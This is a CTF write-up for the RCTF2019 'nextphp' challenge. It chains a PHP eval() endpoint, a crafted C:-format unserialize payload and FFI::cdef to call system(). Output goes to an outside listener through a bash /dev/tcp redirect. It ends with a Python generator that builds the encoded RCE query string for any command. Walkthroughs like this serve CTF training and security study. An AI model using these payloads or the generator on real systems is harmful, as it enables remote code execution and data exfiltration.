[wp] RCTF2019-nextphp

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

Try abusing eval():

?a=echo system("ls");

The system() function is disabled. Try phpinfo() next:

?a=phpinfo();

phpinfo() renders; searching the page for disable_functions shows which functions are disabled (the original post shows the list as a screenshot).

Next, use functions that are not on that list to keep probing:

?a=echo var_dump(scandir("/var/www/html/"));

The result:

  array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) "index.php" [3]=> string(11) "preload.php" }

Read preload.php:

?a=echo%20file_get_contents("preload.php");

which returns the following code:

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

Generate a serialized object with the following script (a copy of preload.php with the exception-throwing __construct() and __set() stubbed out so an instance can be created):

<?php
// Local copy of preload.php used only to generate the payload: the
// exception-throwing __construct() and __set() are stubbed out so an
// instance can be built, and 'arg' is set to the value print_r should echo.
// Run it on PHP < 7.4: from 7.4 on, __serialize() takes precedence and
// serialize() emits the O: form instead of the C: form shown below.
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '666'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        // stubbed: the original throws
    }

    public function __construct () {
        // stubbed: the original throws
    }
}
$A = new A();
var_dump(serialize($A));
?>

Output:

string(76) "C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}"

Pass it in:

?a=include(%27preload.php%27);var_dump(unserialize(%27C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}%27)->__get("ret"));

The response shows print_r printing 666, so func and arg from the payload reach run(). Two details make this work. The payload uses the C: (Serializable) envelope: on the target (PHP 7.4 or later, which the FFI extension used below requires) unserialize() dispatches a C: payload to A::unserialize(), which assigns $this->data directly and then calls run(); an O: payload would go through __unserialize() instead, where the return value of array_merge() is discarded, so attacker-supplied data would never be applied. And since $data is protected, the stored return value is read back through the __get() magic method, called explicitly here as __get("ret").
Then, hmm, I really couldn't think of how to take this further; system, exec and the like are all disabled, so I looked at an earlier write-up from my team:
it mentioned an extension called FFI

<?php
// create FFI object, loading libc and exporting function printf()
$ffi = FFI::cdef(
    "int printf(const char *format, ...);", // this is regular C declaration
    "libc.so.6");
// call C printf()
$ffi->printf("Hello %s!\n", "world");

So the payload-generation script is changed to use FFI::cdef as func and a C prototype of system() as arg. Called with only a declaration and no library name, FFI::cdef resolves the symbol from what is already loaded in the PHP process, and the resulting FFI object, stored in data['ret'], is fetched through __get("ret") so its system() method can be called:

?a=include(%27preload.php%27);unserialize(%27C:1:%22A%22:89:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:26:%22int%20system(char%20*command);%22;}}%27)-%3E__get(%22ret%22)-%3Esystem(%27bash%20-c%20%22ls%20%3E%20/dev/tcp/<listener-ip>/8080%22%27);

system() called through FFI writes to the worker process's own stdout, not to PHP's output buffer, so nothing comes back in the HTTP response; the output is instead redirected to a listener on port 8080 (e.g. nc -lvnp 8080 on <listener-ip>) through bash's /dev/tcp. The listing reveals the flag file; changing the command to cat /flag reads it.
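As an added example (not code from the original write-up or the challenge), the following Python script builds the C:-format payload for class A and the complete ?a= parameter for any func/arg pair, so neither a local PHP nor a pre-7.4 one is needed. It reproduces the 76- and 89-byte strings used above and goes one step further than the write-up by escaping the shell command for PHP's single-quoted literal; the class and file names come from the challenge, while the listener address and port are placeholders.

```python
from __future__ import annotations

from urllib.parse import quote

# Added example, not part of the original write-up: builds the C:-format
# payload for class A (preload.php) and the ?a= parameter that uses it.
# Class name, file name and the system() prototype come from the challenge;
# the listener host/port handed to oob_command() are placeholders.


def php_str(s: str) -> str:
    """PHP serialize() form of a string: s:<byte length>:"<bytes>";"""
    return f's:{len(s.encode())}:"{s}";'


def php_assoc(items: list[tuple[str, str | None]]) -> str:
    """PHP serialize() form of an associative array with string keys.
    None becomes the PHP null token N; (used for the empty 'ret' slot)."""
    body = ''.join(php_str(k) + ('N;' if v is None else php_str(v))
                   for k, v in items)
    return f'a:{len(items)}:{{{body}}}'


def c_payload(func: str, arg: str, cls: str = 'A') -> str:
    """Legacy Serializable envelope: C:<len(name)>:"<name>":<len(data)>:{<data>}.
    unserialize() routes a C: payload to A::unserialize(), which assigns
    $this->data = unserialize($payload) and then calls run(); an O: payload
    would hit __unserialize(), where the array_merge() result is discarded."""
    data = php_assoc([('ret', None), ('func', func), ('arg', arg)])
    return f'C:{len(cls.encode())}:"{cls}":{len(data.encode())}:{{{data}}}'


def php_single_quoted(s: str) -> str:
    """Embed s in a PHP single-quoted literal (only \\ and ' need escaping)."""
    return "'" + s.replace('\\', '\\\\').replace("'", "\\'") + "'"


def print_r_param(value: str) -> str:
    """Sanity-check payload: A::run() calls print_r(value) during unserialize()."""
    p = c_payload('print_r', value)
    return (f"include('preload.php');var_dump(unserialize({php_single_quoted(p)})"
            f"->__get(\"ret\"));")


def ffi_system_param(command: str) -> str:
    """RCE payload: func=FFI::cdef, arg=C prototype of system(). The FFI object
    lands in data['ret'], is read back via __get('ret'), and its system() runs
    the command in the PHP worker process."""
    p = c_payload('FFI::cdef', 'int system(char *command);')
    return (f"include('preload.php');unserialize({php_single_quoted(p)})"
            f"->__get(\"ret\")->system({php_single_quoted(command)});")


def oob_command(cmd: str, listener: str, port: int = 8080) -> str:
    """system() via FFI writes to the worker's real stdout, not the HTTP
    response, so send the output to a listener with bash's /dev/tcp device."""
    return f'bash -c "{cmd} > /dev/tcp/{listener}/{port}"'


def to_query(param: str) -> str:
    """Percent-encode the PHP code for use as the ?a= query parameter."""
    return 'a=' + quote(param, safe='')


if __name__ == '__main__':
    # Placeholder listener address; start e.g. `nc -lvnp 8080` there first.
    listener = '10.0.0.1'
    print(c_payload('print_r', '666'))
    print(to_query(print_r_param('666')))
    print(to_query(ffi_system_param(oob_command('cat /flag', listener))))
```

Append the printed a=... string to the challenge URL; the first line is the 76-byte sanity payload, the last one the FFI chain whose output arrives at the listener rather than in the response.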
